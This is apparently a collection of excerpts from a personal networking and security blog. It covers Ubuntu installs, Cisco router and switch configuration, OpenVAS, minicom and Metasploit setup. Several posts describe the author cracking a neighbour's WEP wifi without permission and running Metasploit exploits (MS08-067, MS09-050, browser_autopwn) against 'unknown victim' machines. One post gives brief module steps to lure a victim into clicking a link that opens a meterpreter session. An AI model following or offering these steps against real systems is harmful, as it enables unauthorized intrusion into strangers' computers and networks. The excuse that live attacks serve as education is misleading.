My Library

Installation ============= If you've already installed the Postgres database and libraries, you can safely skip this section. On Ubuntu: $ sudo apt-get install postgresql-8.4 $ sudo apt-get install rubygems libpq-dev $ sudo gem install pg You may also need some / all of the following packages: # apt-get install libreadline-dev # apt-get install libssl-dev # apt-get install libpq5 # apt-get install ruby-dev For other platforms, please see the distribution's documentation for installing postgres. Become the system postgres user ================================ user@magnolia:$ sudo -s root@magnolia:# su postgres Creating a database user ========================= postgres@magnolia:$ createuser msf_user -P Enter password for new role: Enter it again: Shall the new role be a superuser? (y/n) n Shall the new role be allowed to create databases? (y/n) n Shall the new role be allowed to create more new roles? (y/n) n Creating a database ================...

A slow or without any updates for the past month.I was on leave and not near my notebook.hik hik hik... need to disconnected from space for a while.. even my eyes also need extra assistant to visualize what an image in front of me.. --0-0-- hehehehe... As for this month I already and successfully created a stable VPN tunnel with capacity of 30+MB/s of Download and 20+MB/s of upload.The solution are to change my C1721 to C1751 router with extra Ram in it.Alhamdullilah.I got to know that this C1721 unable to coupe my bursting traffic and causing traffic degraded.Thank's to Cheeesco @ Cisco :P My notebook also got new life with new appearance .. Of cause its an Ubuntu ..Fully migrated to it this month.All is running smooth accept the USB HSDPA modem..but I overcome it after few read on the net. Wvdial as always ;) Will kept you updated ...hopefully.. :D

This came across when I in search of Nessus for Ubuntu and I found some alternative "VS" (Vulnerability Scanner) to be replace and it act as same as Nessus. It's took time in search for the alternative software because the default Ubuntu repository send dont have Nessus.But you may add the repository if you insist to install Nessus in your Ubuntu.For me,I seem less trusting unknown repository and decided to look for OpenVas. Below I show you how to install an OpenVas tools for Vulnerability Scanner. *==============* About OpenVAS *==============* The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution. The actual security scanner is accompanied with a daily updated feed of Network Vulnerability Tests (NVTs), over 18,000 in total (as of August 2010). All OpenVAS products are Free Software and mostly licensed under the GNU G...

I discover this program via net blog.Its a substitute program for hyper-terminal in linux to access CISCO Console port via USB serial port.A very simple program to be used and also easily to be installed in my Ubuntu box. Minicom have a lots of features can be used and their commons features are as belows :- => Setting up a remote serial console => Access a computer / server if the LAN is down => Connect to embedded Linux / BSD device via null modem cable => Connect to Cisco routers for configuration => Connect to dump device i.e. device w/o keyboard and mouse => Dialing directory with auto-redial => Support for UUCP-style lock files on serial devices => Separate script language interpreter => Capture to file => Multiple users with individual configurations Now let's configure Minicom inside our Linux Box... Install minicom Use apt-get under Debian / Ubuntu Linux, enter: $ sudo apt-get install minicom If you are using Red hat Linu...

At last for nearly 2 weeks after all I put through using refurbish Cisco 3640 that causing me the router got memory problem,I completely done the VPN tunnelvia VPDN project using C1721 with IOS Version 12.2(15)T9.I am fully satisfied with it performance.Now I can tunnel via big pipe... har har har >:) Below is the config on how I done the vpdn tunnel and the output I got once connected to vpdn tunnel. ==================== Router 1721 config = ==================== Building configuration... Current configuration : 1202 bytes ! ! Last configuration change at 20:19:35 UTC Mon Jun 23 2008 ! NVRAM config last updated at 20:19:15 UTC Mon Jun 23 2008 ! version 12.2 service timestamps debug datetime msec service timestamps log datetime msec service password-encryption ! hostname VPN_PPTP ! logging queue-limit 100 logging buffered 4096 debugging ! username bard password 0 t3st ! aaa new-model ! ! aaa authentication ppp default local aaa session-id common ip subn...

Today are my second time doing Exinda POC and this time out of KL and the location is at Kota Bharu,Kelantan. At time my expression seem "so-so" and when landing at here the cities look really clean.I never seen any rubbish along the side.My shock is when i took a taxi ride where the taxi driver seem supporting the state government very whelming.They look so happy and very polite. As for tonight I stay at one of Kota Bharu hotel.The hotel look nice and clean.Even for a family vacation I recommended them to stay here.Its near Pasar Besar Siti Khadijah.I doing somethings bad at here and that causing me not to disclosed the hotel name.Not for the hotel but nearest wifi connection.At here they seem using WEP and its easily to be connected with.As for sure have to crack the WEP key 1st ... har har har ... >:) At the time im posting this I already crack one AP so that I can have a connection in my hotel room.Wifi in this hotel only provided at the lobby area and it get ann...

Wiki : - Hypocrisy is the act of pretending to have beliefs, opinions, virtues, feelings, qualities, or standards that one does not actually have. Hypocrisy involves the deception of others and is thus a kind of lie.Although hypocrisy has been called "the tribute that vice pays to virtue", and a bit of it certainly greases the wheels of social exchange, it may also corrode the well-being of those people who continually make or are forced to make use of it. Think..Think..Remember what you said before..

Today I discovered a new things in my penetration testing that I just before I wrote this updates.I not sure if this exploit it rather new nor old but seem it works with windows machines. As I used an auxiliary module to done the task.This module will create a URL/Links and you need to lure your victim to click the said link created upon exploit execution.Below is the setup needed to be done and I sorry this time Im not publishing the videos. p/s : This module uses a combination of client-side and server-side techniques to fingerprint HTTP clients and then automatically exploit them. ======================================== msf>use auxiliary/server/browser_autopwn set LHOST set SRVHOST set SRVPORT Set URIPATH exploit wait till it finish loading and creating the said URL/Link lure victim to click the said IP and ... EUREKA! A meterpreter sessions will establish ====================================== Happy trying.. :)

This blog was mean for educational and knowledge sharing purposes.The video posted are in live situation with unknown victim just to shown how metasploit truly works and how vulnerable they are, when the machine are not regularly updated with new patches. I love to try in live situation as Prove of Concept (POC).Just to capture live feed and shown to the Malaysian that this will be happen if the machine not updated. As you already know that some Malaysian take online security for granted and the user seem dont bother at all about it as long their can surfing,chatting and sending emails. If they came across this blog I hope they can learn somethings good from it. I hope this will benefits you guys out there and if you want to share just comments on its. Thanks Guys, Cheerioo..! p/s : hacking is hacking but Im not hacking..I just cracking :D ---Pretorians

I just tested this exploit this week and its work for Windows Vista SP1.This exploit also can be used with VNCINJECT PAYLOAD and you can view victim via VNC.Even it an old exploits we can see a user still not patching their OS and this MS09_050 Vulnerability its easily can be done.Below is the view of the exploit being done by me.

This was run on Metasploit using auxiliary scanner.Below is the step taken. msf > search nbname [*] Searching loaded modules for pattern 'nbname'... Auxiliary ========= Name Rank Description ---- ---- ----------- scanner/netbios/nbname normal NetBIOS Information Discovery scanner/netbios/nbname_probe normal NetBIOS Information Discovery Prober msf > use auxiliary/scanner/netbios/nbname msf auxiliary(nbname) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no The local client address RHOSTS yes The target address range or CIDR identifier RPORT 137 yes The target port THREADS 1 yes The number of concurrent t...

Watch it and be amaze...

Sorry guys I seldom updates my blog..Is anybody out there watching my blog?har har har ..who cares as long I can update its.. :D Now I teach you all how to do a SPAN Port to monitor / or sniffing :- Of Course In CISCO wayss.. :P Configuration Steps Explanation In order to configure port Fa0/1 as a destination port, the source ports Fa0/2 and Fa0/5, and the management interface (VLAN 1), select the interface Fa0/1 in the configuration mode: Switch(config)#interface fastethernet 0/1 Enter the list of ports to be monitored: Switch(config-if)#port monitor fastethernet 0/2 Switch(config-if)#port monitor fastethernet 0/5 With this command, every packet that these two ports receive or transmit is also copied to port Fa0/1. Issue a variation of the port monitor command in order to configure the monitoring for the administrative interface: Switch(config-if)#port monitor vlan 1 Note: This command does not mean that port Fa0/1 monitors the entire VLAN 1. The vlan 1 keyword simply ...

Today I had a training related to network analyzer using a WildPackets Product knows as OmniPeek. This OmniPeek network analyzers perform deep packet inspection, network forensics, troubleshooting, and packet and protocol analysis of wired and wireless networks. TimeLine network recorders and OmniEngine software probes monitor and analyze NetFlow, sFlow, and packet data at remote locations. About this Omnipeek is part of a network analyzers tools in network troubleshooting's and reporting purposes.There are a lot of product available in the markets right now and I used this as part of network monitoring especially for the customers. OmniPeek is easily to be installed and MUST have a compatible network card that supported by them or else it will be useless buying this product. As far as I review and attending the trainings today.Its shown a lot of reporting and deep packets inspection for a network and also VOIP.Its also can have a playback sound and I love it..har har har.. As part...

Today I install Ubuntu in my new box and I got below error message :- "b43-phy0 ERROR: Firmware file "b43/ucode5.fw" not found" The error "b43-phy0 ERROR: Firmware file "b43/ucode5.fw" not found" should mean that b43-fwcutter is not installed yet on your pc. And that means that the Broadcom firmware for your wireless card is not loaded or installed yet. Please proceed with running the following Terminal commands: sudo aptitude update sudo aptitude install b43-fwcutter b43-fwcutter exists in the Ubuntu repositories, but you will need a working wired Internet connection in Ubuntu in order to locate it and install it.

Installation on Ubuntu Linux The Metasploit Framework is well-supported on the Ubuntu platform. The following instructions should also apply to Kubuntu, Xubuntu, and Debian. If these instructions do not work for your version of Ubuntu, please try the Generic Linux instructions instead. Dependencies¶ Install the Ruby dependencies: $ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems Install the Subversion client: $ sudo apt-get install subversion In order to build the native extensions (pcaprub, lorcon2, etc), the following packages need to be installed: $ sudo apt-get build-dep ruby $ sudo apt-get install ruby-dev libpcap-dev Database support¶ In order to use the database functionality, RubyGems along with the appropriate drivers must be installed: $ sudo apt-get install rubygems libsqlite3-dev $ sudo gem install sqlite3-ruby Or for MySQL: $ sudo apt-get install rubygems libmysqlclient-dev $ sud...

Definition PEWANGA Pewanga came from combination of Malay word "Pewangi + Mangga". This is a highly illustrated as a future perfume design specifically to make people hallucination.Its came across this afternoon by a professor of science from Bukit Jalil also known as Routermen. Hope you all can try it.

Tftpd32 was introduce by my Cisco Instructor a few years back while on CCNA training at that time.This software if easily to used just like plug and play.I used it most of the time to backup all my CISCO Device Config and also wireless controller flash & configuration file that being used in my Enterprise Network.Its not only act as ftp,its also can copy a file to your hardisk but can also transferred a data or maybe a movie. A simple introduction of Tftpd32. --------------------------------- Tftpd32 includes DHCP, TFTP, DNS, SNTP and Syslog servers as well as a TFTP client. The TFTP client and server are fully compatible with TFTP option support (tsize, blocksize and timeout), which allow the maximum performance when transferring the data. Some extended features such as directory facility, security tuning, interface filtering; progress bars and early acknowledgments enhance usefulness and throughput of the TFTP protocol for both client and server. The included DHCP server provides...

Dammit.....I cant online this few week due to my Soma Broadband seem totally down..They said its was cause by technical problem..but now still not up yet..DAMMIT!!.. Thank you from Celcom that provide me with their Broadband service that I subscribe it this evening.Its was really nice as I reach a seep of HSDPA. What is HSDPA? A High-Speed Downlink Packet Access (HSDPA) is an enhanced 3G (third generation) mobile telephony communications protocol in the High-Speed Packet Access (HSPA) family, also dubbed 3.5G, 3G+ or turbo 3G, which allows networks based on Universal Mobile Telecommunications System (UMTS) to have higher data transfer speeds and capacity. Current HSDPA deployments support down-link speeds of 1.8, 3.6, 7.2 and 14.0 Mbit/s. Further speed increases are available with HSPA+, which provides speeds of up to 42 Mbit/s downlink and 84 Mbit/s with Release 9 of the 3GPP standards. Current Celcom Broadband reach downliad limit of 3.6Mbit/s that now I'm using.Its cost me RM100...

Definition of VoIP or Voice over Internet Protocol -------------------------------------------------- Voice over Internet Protocol (VoIP) is a general term for a family of transmission technologies for delivery of voice communications over IP networks such as the Internet or other packet-switched networks. Other terms frequently encountered and synonymous with VOIP are IP telephony, Internet telephony, voice over broadband (VoBB), broadband telephony, and broadband phone. Involvement in VoIP ------------------ Its started at the year of 2002 in my new company that I joined.I was given a task of handling a Dial-Up and VoIP.Its was my routine job to be done all day long.At 1st its was really bored jobs handling Dial-up and I passed it to my teammate and I fully took over VoIP case from my teammate. At that time the connectivity was using a VoIP RAS(Remote Access Server) from CISCO. The simple flow are Lane Line/Handphone(Caller) --->Telco Exchange--->Our RAS--->Other Telco P...

In this video it shown on how to run a metasploit as a tool in my Proof of Concept (POC)that MS08-067 can be exploits if the equipments ( PC/Notebook and Server is not patched). There exploit come with 2 different payloads :- 1) Meterpreter Reverse TCP ---------------------- 2) VNC Injection --------------

INTRODUCTION ============ Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project managed by Rapid7. (A compliment from Metasploit site http://www.metasploit.com/) How I get to know Metasploit? ----------------------------- Its came across on 2009 where and issue of Conficker viruses attacking my network.I got to study this Viruses from the net and suddenly it pop-up a site for exploiting Microsoft Windows Security Vulnerability MS08-067. At that time I run a scanner using nmap and most of the LAN user infected of it.User are lacking in security vulnerability issue even a computer knowledge seem limited or don't ...

wasuppp lancitos... ahaks.. :D Lancit came from 2 people that establish it from irc world.They are me and my friends Routermen..hahahhaha.. the lancit stand for Local Area Network Corporation International Team.Am I right or wrong.. naa..i don't care about it.. As for year 2010 at last I'll already registered a blog.My very 1st blog.This was encourage by sharing community for the world to see and I love them.From them, I learn a lot and now is my time to share with you guys as well.